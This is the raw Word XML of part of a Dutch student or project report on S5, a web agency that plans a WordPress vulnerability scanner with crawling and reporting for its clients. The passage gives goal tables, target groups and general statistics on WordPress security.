            <w:tr w:rsidR="002B7C65" w:rsidRPr="00316498" w14:paraId="69C4AE25" w14:textId="77777777" w:rsidTr="00484743">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3471" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="5412A159" w14:textId="77777777" w:rsidR="002B7C65" w:rsidRPr="00316498" w:rsidRDefault="002B7C65" w:rsidP="00331668">
                  <w:pPr>
                    <w:framePr w:hSpace="180" w:wrap="around" w:vAnchor="text" w:hAnchor="page" w:x="1510" w:y="1013"/>
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                    <w:t>D: Security Rapporten genereren op basis van de gevonden kwetsbaarheden</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="002B7C65" w:rsidRPr="001849E7" w14:paraId="3E816100" w14:textId="77777777" w:rsidTr="00484743">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3471" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="3959A0FA" w14:textId="77777777" w:rsidR="002B7C65" w:rsidRPr="001849E7" w:rsidRDefault="002B7C65" w:rsidP="00331668">
                  <w:pPr>
                    <w:framePr w:hSpace="180" w:wrap="around" w:vAnchor="text" w:hAnchor="page" w:x="1510" w:y="1013"/>
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                    <w:t>DM: Klanten inzicht bieden in de security van hen webshops</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="002B7C65" w:rsidRPr="00232CA1" w14:paraId="4D3D536B" w14:textId="77777777" w:rsidTr="00484743">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3471" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="04731019" w14:textId="77777777" w:rsidR="002B7C65" w:rsidRPr="00232CA1" w:rsidRDefault="002B7C65" w:rsidP="00331668">
                  <w:pPr>
                    <w:framePr w:hSpace="180" w:wrap="around" w:vAnchor="text" w:hAnchor="page" w:x="1510" w:y="1013"/>
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                    <w:t>AI: S5 wilt de klanten meer overzicht bieden op de security van hen webshops</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="44B5FC86" w14:textId="77777777" w:rsidR="002B7C65" w:rsidRDefault="002B7C65" w:rsidP="00BD5AD1">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3D844F51" w14:textId="77777777" w:rsidR="00BD5AD1" w:rsidRDefault="00394B19" w:rsidP="002F3E27">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252130304" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6ABCAEEC" wp14:editId="46730BFF">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-910416</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-1134528</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="61" name="Rectangle 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624FC" id="Rectangle 61" o:spid="_x0000_s1026" style="position:absolute;margin-left:-71.7pt;margin-top:-89.3pt;width:25pt;height:1031.7pt;z-index:-2511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" fillcolor="#70ad47 [3209]" strokecolor="#70ad47" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="002B7C65">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1189D96F" w14:textId="77777777" w:rsidR="00BD5AD1" w:rsidRDefault="00BD5AD1" w:rsidP="002F3E27"/>
    <w:p w14:paraId="38FE9212" w14:textId="70673B48" w:rsidR="00BD5AD1" w:rsidRPr="00BD5AD1" w:rsidRDefault="00272E09">
      <w:r w:rsidRPr="00272E09">
        <w:t>Tabel 2.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5841BA37" w14:textId="77777777" w:rsidR="002B7C65" w:rsidRDefault="005C6FF5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C6FF5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Business doelen verfijnen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBAF03A" w14:textId="6C91AFA9" w:rsidR="00F5420D" w:rsidRPr="002B7C65" w:rsidRDefault="003A6872">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>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GridTable4-Accent6"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2827"/>
        <w:gridCol w:w="5670"/>
      </w:tblGrid>
      <w:tr w:rsidR="0067285E" w14:paraId="086F346B"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AD76EA0" w14:textId="4512F2C0" w:rsidR="00773357" w:rsidRDefault="001A5781">
            <w:r>
              <w:t>Business Doelen</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5670" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05BB95D1" w14:textId="6B4F8F94" w:rsidR="00773357" w:rsidRDefault="001A5781">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Verfijnde doelen (Engineering Objectieven)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0067285E" w14:paraId="39FD0988"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2D3A96E8" w14:textId="170D14BD" w:rsidR="00773357" w:rsidRDefault="000A510D">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7FAA5C8E" w:rsidR="001473B4" w:rsidRDefault="00BA29E1">
                  <w:r>
                    <w:t>Een Client applicatie voor de klant</w:t>
                  </w:r>
                  <w:r w:rsidR="00F74324">
                    <w:t xml:space="preserve"> wat dient als</w:t>
                  </w:r>
                  <w:r w:rsidR="00B52E66">
                    <w:t xml:space="preserve"> Endpoint</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De Wep Applicatie Scanner</w:t>
                  </w:r>
                  <w:r w:rsidR="00F553C8">
                    <w:t>, Crawler, Scanner, Rapporteren</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="3BBC184D" w14:textId="77777777" w:rsidR="00773357" w:rsidRDefault="00773357">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0067285E" w14:paraId="35263258" w14:textId="77777777" w:rsidTr="005A427C">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>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pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1A3B9026" w14:textId="0A066558" w:rsidR="00505582" w:rsidRDefault="00972417">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00272E09">
        <w:t>Tabel 2.6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09AD3DFD" w14:textId="77777777" w:rsidR="00BD5AD1" w:rsidRDefault="00BD5AD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="562FCAF5" w14:textId="77777777" w:rsidR="00BD5AD1" w:rsidRDefault="00BD5AD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0289EDC0" w14:textId="77777777" w:rsidR="00BD5AD1" w:rsidRDefault="00BD5AD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0072A2F0" w14:textId="77777777" w:rsidR="00BD5AD1" w:rsidRDefault="00BD5AD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48E18FE8" w14:textId="19E98F60" w:rsidR="00BD5AD1" w:rsidRDefault="00BD5AD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253189120" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1BD06A79" wp14:editId="70C96ADB">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-895524</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-384088</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="448" name="Rectangle 4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BCA77" id="Rectangle 448" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.5pt;margin-top:-30.2pt;width:25pt;height:1031.7pt;z-index:-2501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PNO5kCAAC2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" fillcolor="#70ad47 [3209]" strokecolor="#70ad47" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E2E0F6" w14:textId="77777777" w:rsidR="00BD5AD1" w:rsidRDefault="00BD5AD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7989982A" w14:textId="77307AF2" w:rsidR="00D12EE6" w:rsidRDefault="00550C76">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>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40D8261F"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p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable4-Accent6"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2225"/>
        <w:gridCol w:w="3113"/>
        <w:gridCol w:w="2022"/>
        <w:gridCol w:w="1700"/>
      </w:tblGrid>
      <w:tr w:rsidR="005653E3" w14:paraId="11DF6E47" w14:textId="5463FAB7" w:rsidTr="007A4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pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Verfijnde doelen (Engineering Objectieven)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2022" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E1E937B" w14:textId="2149EE4F" w:rsidR="005653E3" w:rsidRDefault="005653E3" w:rsidP="008B56CF">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Kwaliteit Attribuut</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A96194C" w14:textId="3B1A16B4" w:rsidR="005653E3" w:rsidRDefault="005653E3" w:rsidP="008B56CF">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Prioriteit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005653E3" w14:paraId="4A6ACDC7" w14:textId="0B5531C9" w:rsidTr="007A4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43965C7B" w14:textId="3D5EACF5" w:rsidR="005653E3" w:rsidRDefault="005653E3" w:rsidP="008B56CF">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114" w:type="dxa"/>
          </w:tcPr>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="TableGrid"/>
              <w:tblW w:w="0" w:type="auto"/>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="2887"/>
            </w:tblGrid>
            <w:tr w:rsidR="005653E3" w14:paraId="4F3420DB" w14:textId="77777777" w:rsidTr="00195C12">
              <w:trPr>
                <w:trHeight w:val="627"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="5556" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="7A66A77B" w14:textId="20A61BD3" w:rsidR="005653E3" w:rsidRDefault="005653E3" w:rsidP="008B56CF">
                  <w:r>
                    <w:t>Een Client applicatie voor de klant wat di</w:t>
                  </w:r>
                  <w:r w:rsidR="007C0957">
                    <w:t>ent als Endpoint.</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3CDD2ECD" w:rsidR="005653E3" w:rsidRDefault="00914A8D" w:rsidP="008B56CF">
                  <w:r>
                    <w:t xml:space="preserve">De </w:t>
                  </w:r>
                  <w:r w:rsidR="00650BF0">
                    <w:t>Webapplicatie scanner</w:t>
                  </w:r>
                  <w:r w:rsidR="00F553C8">
                    <w:t>, Crawler, Scanner, Rapporteren</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="7C0AEE74"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c>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
          </w:tcPr>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="TableGrid"/>
              <w:tblW w:w="0" w:type="auto"/>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="1474"/>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r>
      <w:tr w:rsidR="005653E3" w14:paraId="5D400583" w14:textId="2C91D7D7" w:rsidTr="007A4755">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>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7"/>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c>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
          </w:tcPr>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="TableGrid"/>
              <w:tblW w:w="0" w:type="auto"/>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="1474"/>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r>
    </w:tbl>
    <w:p w14:paraId="3FCD1581" w14:textId="5B59F8FF" w:rsidR="00DF41B1" w:rsidRPr="00DF41B1" w:rsidRDefault="002F3E27" w:rsidP="00DF41B1">
      <w:r>
        <w:t>Tabel 2.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BDBAA7" w14:textId="0CD7BCEF" w:rsidR="009004E6" w:rsidRPr="009004E6" w:rsidRDefault="006A5AE7" w:rsidP="00971D60">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.2 Doelgroep</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2540C3" w14:textId="011F69F4" w:rsidR="008A79F1" w:rsidRDefault="005F0E84" w:rsidP="008A79F1">
      <w:r>
        <w:t>S5 ontwikkelt en onderhoudt website</w:t>
      </w:r>
      <w:r w:rsidR="00096F81">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> voor MKB-bedrijven. De websites</w:t>
      </w:r>
      <w:r w:rsidR="008A79F1">
        <w:t xml:space="preserve"> worden ov</w:t>
      </w:r>
      <w:r w:rsidR="00096F81">
        <w:t>er het algemeen ontwikkeld in het</w:t>
      </w:r>
      <w:r w:rsidR="008A79F1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00215BAE">
        <w:t>CMS</w:t>
      </w:r>
      <w:r w:rsidR="008A79F1">
        <w:t xml:space="preserve"> Wordpress</w:t>
      </w:r>
      <w:r w:rsidR="00414824">
        <w:t xml:space="preserve">. WordPress heeft zijn </w:t>
      </w:r>
      <w:r w:rsidR="008A79F1">
        <w:t>CMS in de taal PHP ontwikkeld en</w:t>
      </w:r>
      <w:r w:rsidR="00091D46">
        <w:t xml:space="preserve"> heeft daarvoor een</w:t>
      </w:r>
      <w:r w:rsidR="008A79F1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00091D46">
        <w:t>eigen framework gebruikt.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable4-Accent6"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4531"/>
      </w:tblGrid>
      <w:tr w:rsidR="00971D60" w14:paraId="2C5E93E5" w14:textId="77777777" w:rsidTr="007A4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7F2A81" w14:textId="0BC7371A" w:rsidR="00971D60" w:rsidRDefault="00971D60" w:rsidP="00731588">
            <w:r>
              <w:t>Doelgroep</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00971D60" w14:paraId="1071CCC0" w14:textId="77777777" w:rsidTr="007A475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531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F3CEE04" w14:textId="5E28BF79" w:rsidR="00971D60" w:rsidRDefault="00971D60" w:rsidP="008A79F1">
            <w:r>
              <w:t>Particulier die eigenaar is van een Wordpress website</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00971D60" w14:paraId="766761CF" w14:textId="77777777" w:rsidTr="007A4755">
        <w:trPr>
          <w:trHeight w:val="209"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="186891F9" w14:textId="244739ED" w:rsidR="00971D60" w:rsidRDefault="00971D60" w:rsidP="00971D60">
            <w:r>
              <w:t xml:space="preserve">Bedrijf die eigenaar is van een Wordpress website </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3D2F3AFA" w14:textId="64433CEC" w:rsidR="00B76760" w:rsidRDefault="00272E09" w:rsidP="008A79F1">
      <w:r>
        <w:t>Tabel 2.</w:t>
      </w:r>
      <w:r w:rsidR="005330B9">
        <w:t>8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61098138" w14:textId="478D1574" w:rsidR="001428EA" w:rsidRDefault="00FE7016" w:rsidP="001D4CC8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.2.1 </w:t>
      </w:r>
      <w:r w:rsidR="00CE1951">
        <w:t>Wordpress op gebied van security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1A0FC4" w14:textId="77777777" w:rsidR="001D4CC8" w:rsidRPr="001D4CC8" w:rsidRDefault="001D4CC8" w:rsidP="001D4CC8"/>
    <w:p w14:paraId="282AA586" w14:textId="48165A82" w:rsidR="00B84DAB" w:rsidRDefault="001F0841" w:rsidP="008A79F1">
      <w:r>
        <w:t>Websites</w:t>
      </w:r>
      <w:r w:rsidR="008A79F1">
        <w:t xml:space="preserve"> die</w:t>
      </w:r>
      <w:r w:rsidR="00EA23F9">
        <w:t xml:space="preserve"> ontwikkeld zijn in Wordpress </w:t>
      </w:r>
      <w:r w:rsidR="008A79F1">
        <w:t>zijn kwetsbaar voor cyberaanvallen. 27% procent van alle websites draaien op WordPress en het heeft 60% van het marktaandeel als het gaa</w:t>
      </w:r>
      <w:r w:rsidR="00AE5045">
        <w:t>t om CMS’s</w:t>
      </w:r>
      <w:r w:rsidR="008A79F1">
        <w:t xml:space="preserve"> (T</w:t>
      </w:r>
      <w:r w:rsidR="008A79F1" w:rsidRPr="00205B00">
        <w:t>orquemag</w:t>
      </w:r>
      <w:r w:rsidR="008A79F1">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="008A79F1" w:rsidRPr="00C76D38">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>2xx</w:t>
      </w:r>
      <w:r w:rsidR="00C7574C" w:rsidRPr="00C76D38">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>x)</w:t>
      </w:r>
      <w:r w:rsidR="00C7574C">
        <w:t>. Dit betekent</w:t>
      </w:r>
      <w:r w:rsidR="00385B76">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00C7574C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C8026A">
        <w:t>in theorie</w:t>
      </w:r>
      <w:r w:rsidR="00385B76">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00C8026A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C7574C">
        <w:t>dat als het CMS</w:t>
      </w:r>
      <w:r w:rsidR="008A79F1">
        <w:t xml:space="preserve"> een kwetsbaarheid heeft</w:t>
      </w:r>
      <w:r w:rsidR="00354F26">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="008A79F1">
        <w:t xml:space="preserve"> dan zijn 27% van alle websites kwetsbaar </w:t>
      </w:r>
      <w:r w:rsidR="00EA23F9">
        <w:t>voor cyberaanvallen. Ithemes</w:t>
      </w:r>
      <w:r w:rsidR="008A79F1">
        <w:t xml:space="preserve"> vermeld in het artikel “is WordPress Really Secure?” dat de WordPress CMS kampt met securityproblemen. De securityproblemen komen van drie componenten af: WordPress Core, WordPress </w:t>
      </w:r>
      <w:r w:rsidR="001F0774">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253168640" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1385B1C5" wp14:editId="045ECA77">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-911460</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-915035</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="772" name="Rectangle 77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129E2" id="Rectangle 772" o:spid="_x0000_s1026" style="position:absolute;margin-left:-71.75pt;margin-top:-1in;width:25pt;height:1031.7pt;z-index:-2501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OzJkCAAC2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" fillcolor="#70ad47 [3209]" strokecolor="#70ad47" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="008A79F1">
        <w:t>themes, WordPress plugins. De grootste deel van de security kwet</w:t>
      </w:r>
      <w:r w:rsidR="004F06A4">
        <w:t>sbaarheden komt niet af van de k</w:t>
      </w:r>
      <w:r w:rsidR="008A79F1">
        <w:t>ern van WordPress maar van de WordPress plugins. De WordPress plugins rekenen vo</w:t>
      </w:r>
      <w:r w:rsidR="00330FA9">
        <w:t>or 52% van alle kwetsbaarheden.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DD2119" w14:textId="77777777" w:rsidR="00BD5AD1" w:rsidRDefault="00BD5AD1" w:rsidP="009B46E2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="464B8CDB" w14:textId="77777777" w:rsidR="00BD5AD1" w:rsidRDefault="00BD5AD1" w:rsidP="009B46E2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B67800E" w14:textId="77777777" w:rsidR="00BD5AD1" w:rsidRDefault="00BD5AD1" w:rsidP="009B46E2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CA87267" w14:textId="77777777" w:rsidR="00BD5AD1" w:rsidRDefault="00BD5AD1" w:rsidP="009B46E2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5539A0AC" w14:textId="77777777" w:rsidR="00BD5AD1" w:rsidRDefault="00BD5AD1" w:rsidP="009B46E2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1ED5DCB9" w14:textId="77777777" w:rsidR="00BD5AD1" w:rsidRDefault="00BD5AD1" w:rsidP="009B46E2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6351A091" w14:textId="3BE2ED53" w:rsidR="00B84DAB" w:rsidRPr="009B46E2" w:rsidRDefault="00484743" w:rsidP="009B46E2">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253191168" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="43F7AA5C" wp14:editId="3D4244E3">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
